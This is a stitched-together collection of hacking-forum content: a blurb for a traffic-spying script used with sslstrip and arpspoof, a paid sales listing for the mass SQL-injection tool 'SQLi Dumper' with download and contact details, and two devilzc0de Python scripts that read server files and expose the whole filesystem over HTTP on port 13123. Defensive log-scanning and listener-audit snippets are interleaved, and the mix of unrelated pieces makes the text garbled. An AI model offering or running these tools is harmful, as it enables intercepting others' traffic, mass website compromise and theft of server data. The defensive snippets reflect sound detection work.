Works on Linux as the root user, combined with sslstrip and arpspoof.
The idea of the script is simply to spy on the traffic of devices connected to your network.
The script can be found on GitHub: Juli
And this is the official blog post of the Juli script
Designed to be automated to find and exploit web security vulnerabilities en masse. It is robust, works in background threads and is super fast. It uses an advanced search engine with seven different online search services (Google, Yandex, Bing, Yahoo, Sapo, Altavista and Terravista).
SQLi Dumper Features:
-Supports multiple online search engines (to find the trajects);
-Automated exploiting and analyzing from a URL list;
-Automated search for data in a bulk URL list;
-Automated analyzer for injection points using URL, POST, Cookies, UserLogin or UserPassword;
-Dumper supports dumping data with multi-threading (databases/tables/columns/fetching data);
-Exploiter supports up to 100x threads;
-Analyzer and Dumper support up to 50x threads;
-Advanced WAF bypass methods;
-Advanced custom query box;
-Dumper can dump large amounts of data, with great control of the delay of each request (multi-threading);
-Easy switching from vulnerability to vulnerability;
-Supports proxy lists;
-GeoIP database;
-Internal database;
-Trash System;
-Admin login finder;
-Hash online cracker;
-Reverse IP;
-Standalone .exe (no install).
SQL Injection Methods supported:
- MySQL
  - Union (Integer / String)
  - Error (Integer / String)
  ** Error Methods:
  - Double Query
  - XPATH - ExtractValue
  - XPATH - UpdateXML
  - Brute Forcing
  - Blind
  - Load File
  - Load File Scanner
  ** Illegal Mix Of Collations:
  - UnHexHex()
  - Binary()
  - Cast As Char
  - Compress(Uncompress())
  - Convert Using utf8
  - Convert Using latin1
  - Aes_decrypt(aes_encrypt())
- MS SQL
  - Union (Integer / String)
  - Error (Integer / String)
  ** Illegal Mix Of Collations:
  - SQL_Latin1;
  - Cast As Char.
- Oracle
  - Union (Integer / String)
  - Error (Integer / String)
  ** Error Methods:
  - GET_HOST_ADDRESS
  - DRITHSX.SN
  - GETMAPPINGXPATH.
  ** Illegal Mix Of Collations:
  - Cast As Char.
  ** Supports TOP N Types:
  - ROWNUM
  - RANK()
  - DENSE_RANK()
** Analyzer also detects:
- MS Access
- PostgreSQL
- Sybase
** To use this tool you should know a little about SQL injection.
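Seen from the server side, the methods listed above leave recognisable function names in request URLs. The following is an added example, not part of the original post: it scans access-log lines for those names after undoing URL encoding and inline SQL comments. The log lines, the marker labels and the Common Log Format layout are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Function names come from the method list above; matching is case-insensitive.
MARKERS = {
    "mysql-error-xpath": r"\b(?:extractvalue|updatexml)\s*\(",
    "mysql-load-file": r"\bload_file\s*\(",
    "oracle-error": r"\b(?:get_host_address|drithsx\.sn|getmappingxpath)\s*\(",
    "union-select": r"\bunion\s+(?:all\s+)?select\b",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in MARKERS.items()}
# Common Log Format: capture client address, request target and status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def normalize(target):
    """Undo up to two layers of URL encoding and strip inline SQL comments."""
    for _ in range(2):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    target = re.sub(r"/\*.*?\*/", " ", target)  # /**/ standing in for a space
    return re.sub(r"\s+", " ", target)

def scan(lines):
    """Return (hits, per_client) for requests matching any marker."""
    hits, per_client = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        text = normalize(target)
        names = sorted(n for n, rx in COMPILED.items() if rx.search(text))
        if names:
            hits.append((client, int(status), names))
            per_client[client] += 1  # bursts from one client suggest automation
    return hits, per_client

# Constructed sample log lines (documentation address ranges).
SAMPLE = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=1+and+extractvalue(1,2) HTTP/1.1" 500 312',
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /p.php?id=1%2520union%252F**%252Fselect%25201 HTTP/1.1" 200 90',
    '198.51.100.7 - - [10/Oct/2023:13:55:37 +0000] "GET /view.php?f=1%20and%20load_file(0x00) HTTP/1.1" 200 77',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=student+union+elections HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.html HTTP/1.1" 200 1043',
]
```

Only GET targets are visible in a standard access log; POST bodies and cookies, which the tool also lists as injection points, need request-body or WAF logging to be inspected the same way.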
Demo Version Limitations:
- Max. URL per Search 500
- Get links by ReverseIP DISABLED
- Max. Trash 5000 URLs
- SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
- Exploiter Max. Threads 20
- Analyzer Max. Threads 3
- Running multiple instances DISABLED
- Running multiple mini dump instances DISABLED
- Dumping Rows with multi-threading DISABLED
- Network Credential DISABLED
- Injection Methods for POST, Cookies, etc. DISABLED
- Proxy DISABLED
- ReverseIP DISABLED
- Load_File() scanner DISABLED
** Download: http://www.mediafire.com/?vfb8fps2beppsib
** Dependencies: Microsoft .NET Framework 4.x
http://www.microsoft.com/en-us/download/details.aspx?id=17851
Price and Payment Method:
- Binary (EXE): 150 USD / 115€ Euro
- Source Code (VB.NET 2010): 2.000 USD / 1.550€ Euro
** Liberty Reserve
Contacts:
- mysqlidumper [at] gmail [dot] com (email)
- c4rl0s@jabber.org (IM Chat)
More Screen Shots:
Max. URL per Search 500 if you bought the v. 4.x
Get links by ReverseIP DISABLED
Max. Trash 5000 URLs
SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
Exploiter Max. Threads 20
Analyzer Max. Threads 3
Network Credential DISABLED
Proxy DISABLED
ReverseIP DISABLED
Blinder are disabled in DEMO EDITION, you can check the Version() only for a demo :)
Load_File() scanner DISABLED
#!/usr/bin/env python
# devilzc0de.org (c) 2012
# Lists a directory, prints a file to stdout, or copies a file to a new path.
import sys
import os


def copyfile(source, dest, buffer_size=1024*1024):
    # Accept either paths or already-open file objects.
    if not hasattr(source, 'read'):
        source = open(source, 'rb')
    if not hasattr(dest, 'write'):
        dest = open(dest, 'wb')
    # Copy in buffer_size chunks until end of file.
    while 1:
        copy_buffer = source.read(buffer_size)
        if copy_buffer:
            dest.write(copy_buffer)
        else:
            break
    source.close()
    dest.close()


if __name__=="__main__":
    if not len(sys.argv) == 3 and not len(sys.argv) == 2:
        sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
        sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
        sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
        sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
        sys.exit(1)
    target = sys.argv[1].replace("\\","/")
    if os.path.isdir(target):
        # Directory: print size (or a [ DIR ] tag) and name for each entry.
        if not target.endswith("/"):
            target = target + "/"
        entries = os.listdir(target)
        for d in entries:
            fs = ""
            if os.path.isdir(target + d):
                fs = "[ DIR ]"
            elif os.path.isfile(target + d):
                fs = os.path.getsize(target + d)
            fs = str(fs)
            sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
    elif os.path.isfile(target):
        if len(sys.argv) == 3:
            # Two arguments: copy the file to the given destination.
            copyfile(target, sys.argv[2])
        else:
            # One argument: stream the file to stdout (binary-safe on Python 2 and 3).
            out = getattr(sys.stdout, 'buffer', sys.stdout)
            f = open(target, "rb")
            try:
                while 1:
                    byte = f.read(1024)
                    if not byte:
                        break
                    out.write(byte)
                    out.flush()
            finally:
                f.close()
    else:
        sys.stdout.write("Can't found file or folder : " + target)
python -h
Now take this Python script and name it webs.py. It is a small Python script that opens a new port on the server using the SimpleHTTPServer (Python) module. The script's default port is 13123.
http://pastebin.com/PddvszKC
#!/usr/bin/env python
# devilzc0de.org (c) 2012
# Python 2 module names; on Python 3 these are http.server and socketserver.
import SimpleHTTPServer
import SocketServer
import os

port = 13123

if __name__=='__main__':
    # Serve from the filesystem root, so every readable file is reachable over HTTP.
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
    # An empty host string binds to all interfaces.
    httpd = SocketServer.TCPServer(("", port), Handler)
    print("Now open this server on webbrowser at port : " + str(port))
    print("example: http://maho.com:" + str(port))
    httpd.serve_forever()
python webs.py
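webs.py changes directory to / and binds to every interface, so any file its account can read becomes reachable on port 13123 without authentication. The following is an added example, not from the original post: it parses /proc/net/tcp content and flags listeners that are neither loopback-only nor on an expected port. The allowlist and the sample table are constructed assumptions.

```python
import socket
import struct

LISTEN = "0A"                  # TCP_LISTEN state code used in /proc/net/tcp
ALLOWED_PORTS = {22, 80, 443}  # assumption: listeners expected on this host

def parse_addr(field):
    """Decode 'HHHHHHHH:PPPP' (little-endian IPv4 in hex, port in hex)."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)

def unexpected_listeners(proc_net_tcp, allowed=ALLOWED_PORTS):
    """Return listening sockets that are not loopback-only and not allowlisted."""
    findings = []
    for row in proc_net_tcp.splitlines()[1:]:  # first line is the column header
        cols = row.split()
        if len(cols) < 10 or cols[3] != LISTEN:
            continue
        ip, port = parse_addr(cols[1])
        if port in allowed or ip.startswith("127."):
            continue
        findings.append({"ip": ip, "port": port,
                         "uid": int(cols[7]), "inode": int(cols[9])})
    return findings

# Constructed sample in /proc/net/tcp layout: sshd on 22, a loopback-only
# database on 3306, one established session, and a listener on 0x3343 (13123)
# owned by uid 33.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20001 1
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   112        0 20002 1
   2: 00000000:3343 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 20003 1
   3: 0F02000A:0016 0202000A:C3A8 01 00000000:00000000 00:00000000 00000000     0        0 20004 1
"""

if __name__ == "__main__":
    # On a live Linux host, read the real table instead of the sample.
    with open("/proc/net/tcp") as fh:
        for finding in unexpected_listeners(fh.read()):
            print(finding)
```

The reported inode can be matched against the `socket:[inode]` links under /proc/<pid>/fd to identify the owning process.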